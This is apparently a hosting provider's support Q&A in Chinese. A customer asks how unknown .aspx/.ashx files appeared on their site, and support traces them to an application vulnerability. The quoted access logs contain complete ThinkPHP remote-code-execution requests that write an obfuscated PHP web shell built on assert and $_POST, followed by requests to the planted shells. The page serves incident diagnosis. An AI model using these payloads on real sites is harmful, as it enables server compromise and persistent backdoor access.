問:麻煩幫忙查一下.
heiyu/class.aspx
heiyu/hei.ashx
這2個(gè)文件是怎么出現(xiàn)的.是通過FTP上傳的還是通過某個(gè)文件進(jìn)行創(chuàng)建的?,麻煩幫忙查一下這個(gè)文件是怎么出現(xiàn)的是通過上傳的還是通過某個(gè)文件
問:links.asp
還有這4個(gè)文件.
答:您好,我們檢查了,不是通過ftp進(jìn)來的, 是您程序漏洞的方式。文件的創(chuàng)建時(shí)間基本和這些注入時(shí)間吻合(windows系統(tǒng)日志要加8才是北京時(shí)間),請及時(shí)聯(lián)系程序方檢查清理,并及時(shí)修補(bǔ)程序漏洞,網(wǎng)站訪問日志存放在您空間,是17號入侵的,非常感謝您長期對我司的支持!
07:25:54 POST /heiyu/hei.ashx dir=Dick – 127.0.0.1 HTTP/1.1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0 http://www.bjwnht.com.cn/heiyu/hei.ashx?dir=Dick 200 456 3390
05:32:51 GET / s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=fkyot.php&content=%3C?php%20print(md;$a=str_replace(%22vbnm%22,%22%22,%22asvbnmsert%22);@$a($_POST%5Bysy%5D);?%3Eysydjsjxbei37 – 127.0.0.1 HTTP/1.1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2) http://www.bjwnht.com.cn/?s=index/\\think\\template\\driver\\file/write&cacheFile=fkyot.php&content=<?php print(md;$a=str_replace("vbnm","","");@$a($_POST[ysy]);?> 200 63913 1625
05:32:53 GET / s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=imbok.php&vars%5B1%5D%5B%5D=%3C?php%20print(md;$a=str_replace(%22vbnm%22,%22%22,%22asvbnmsert%22);@$a($_POST%5Bysy%5D);?%3Eysydjsjxbei37$ – 127.0.0.1 HTTP/1.1 Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2) http://www.bjwnht.com.cn/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=imbok.php&vars[1][]=<?php print(md;$a=str_replace("vbnm","","");@$a($_POST[ysy]);?>ysydjsjxbei37$ 200 64085 1625
07:25:54 POST /heiyu/hei.ashx dir=Dick – 127.0.0.1 HTTP/1.1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0 http://www.bjwnht.com.cn/heiyu/hei.ashx?dir=Dick 200 456 3390
問:fukun.aspx 這個(gè)不是我們的文件. 應(yīng)該是這個(gè)文件導(dǎo)致創(chuàng)建了下面的這些文件. 問題是 這個(gè)文件是2015年的?? 這個(gè)不太可能吧? 能不能查到這個(gè)文件是怎么來的.通過FTP的嗎. 還是由什么文件創(chuàng)建的?
答:您好,這些文件都是5月14日建立的。
但這個(gè)文件早在5月1日就有訪問請求記錄,我們查過了都不是通過ftp方式上傳的,只能說明您網(wǎng)站被篡改以后一直沒有清理干凈,所以才會(huì)導(dǎo)致反復(fù)被掛馬。現(xiàn)在最好的辦法就是重新上傳全新的程序,如果再次被掛馬,可以再來檢查分析入侵點(diǎn),非常感謝您長期對我司的支持!
11:01:42 GET /heiyu/guanli/fukun.aspx u=Damo – 127.0.0.1 HTTP/1.1 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0 – 200 1178 3265
問:感謝你. 已經(jīng)清理. 我再觀察一下
答:您好,好的,若還有其他需要,請及時(shí)聯(lián)系反饋,非常感謝您長期對我司的支持!
三五互聯(lián)(35.com)是經(jīng)工信部、ICANN、CNNIC認(rèn)證審批,持有ISP、云牌照、IDC、CDN、頂級域名注冊商等全業(yè)務(wù)資質(zhì)的正規(guī)老牌服務(wù)商,自成立至今20余年專注于域名注冊、虛擬主機(jī)、云服務(wù)器、企業(yè)郵箱、企業(yè)建站等互聯(lián)網(wǎng)基礎(chǔ)服務(wù)!
截止目前,已經(jīng)為超過2000萬個(gè)域名提供了注冊、解析等服務(wù),是中國五星級域名注冊注冊商!已為超過50萬個(gè)網(wǎng)站提供了高速穩(wěn)定的云托管服務(wù),獲評中國最受用戶喜歡云主機(jī)服務(wù)商。
三五互聯(lián)提供全方位7X24H專業(yè)售后支撐,域名注冊特價(jià)1元起,高速穩(wěn)定云主機(jī)45元起,更多詳情請瀏覽三五互聯(lián)官網(wǎng):http://m.shinetop.cn/
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享網(wǎng)絡(luò)內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。郵箱:3140448839@qq.com。本站原創(chuàng)內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明出處:
三五互聯(lián)知識庫 »
麻煩幫忙查一下這個(gè)文件是怎么出現(xiàn)的是通過上傳的還是通過某個(gè)文
